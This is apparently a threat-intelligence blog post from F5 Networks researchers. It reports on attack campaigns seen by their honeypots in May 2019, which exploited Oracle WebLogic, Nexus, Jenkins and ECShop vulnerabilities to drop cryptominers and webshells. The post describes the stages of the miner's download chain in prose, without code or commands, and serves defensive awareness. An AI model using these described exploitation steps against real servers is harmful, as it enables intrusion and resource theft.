Security researchers at F5 Networks constantly monitor web traffic at various locations throughout the world. This allows us to detect “in the wild” malware, and to get an insight into the current threat landscape. Here’s an overview of what we saw in May 2019.
Throughout the month of May, the team detected 10 new attack campaigns:
- Seven campaigns targeted two separate Oracle WebLogic server vulnerabilities: CVE-2017-10271 and CVE-2019-2725. Both make WebLogic servers vulnerable to unsafe deserialization, leading to remote code execution (RCE).
- In addition to the attacks exploiting Oracle WebLogic vulnerabilities, we tracked three additional attack campaigns:
- Nexus Repository Manager 3 Remote Code Execution (CVE-2019-7238): The threat actor instructs the server to download and execute a cryptocurrency miner.
- Jenkins access control list (ACL) bypass and metaprogramming RCE (CVE-2019-1003000): The threat actor instructs the server to download and execute a cryptocurrency miner.
- ECShop Remote Code Execution: The threat actor tries to upload a webshell on a vulnerable server.
Oracle WebLogic Server Deserialization Remote Code Execution
Oracle WebLogic servers are widely used by corporations and have been vulnerable to various deserialization vulnerabilities. Over the last few months, we have detected campaigns targeting an Oracle WebLogic Server (WLS) Security Component vulnerability that leads to RCE. In this article, we’ll focus on some of the payloads sent by threat actors. For more information on the technical details behind the vulnerability, please read Vulnerabilities, Exploits, and Malware Driving Attack Campaigns in April 2019.
Cryptomining Malware: Plus (CVE-2017-10271)
A new exploit request was received by our honeypot where the threat actor is trying to exploit CVE-2017-10271 to download a malicious file from an IP controlled by the threat actor.
Figure 1 shows the initial request received by our honeypot. An Oracle WebLogic server vulnerable to CVE-2017-10271 will download the malicious file from the IP address controlled by the threat actor and execute it. This malicious file displays telltale signs of a cryptocurrency miner. Most cryptominers attempt to find other processes running on the server that are also malicious. This frees up the server resources for the cryptominer.
Once processor resources are available, the threat actors attempt to use those processes to mine cryptocurrency. Figure 2 shows the content of the malicious file a vulnerable server is instructed to download. The first few lines of the file try to kill certain processes and remove another competitive Kerberods cryptominer. In the second half of the file, it attempts to download and execute malicious files in the following order.
- Kok: Contains code for killing other competing malwares
- Wow_ora: Watchdog to ensure the cryptominer is running
- Rc6: Downloads and executes the cryptominer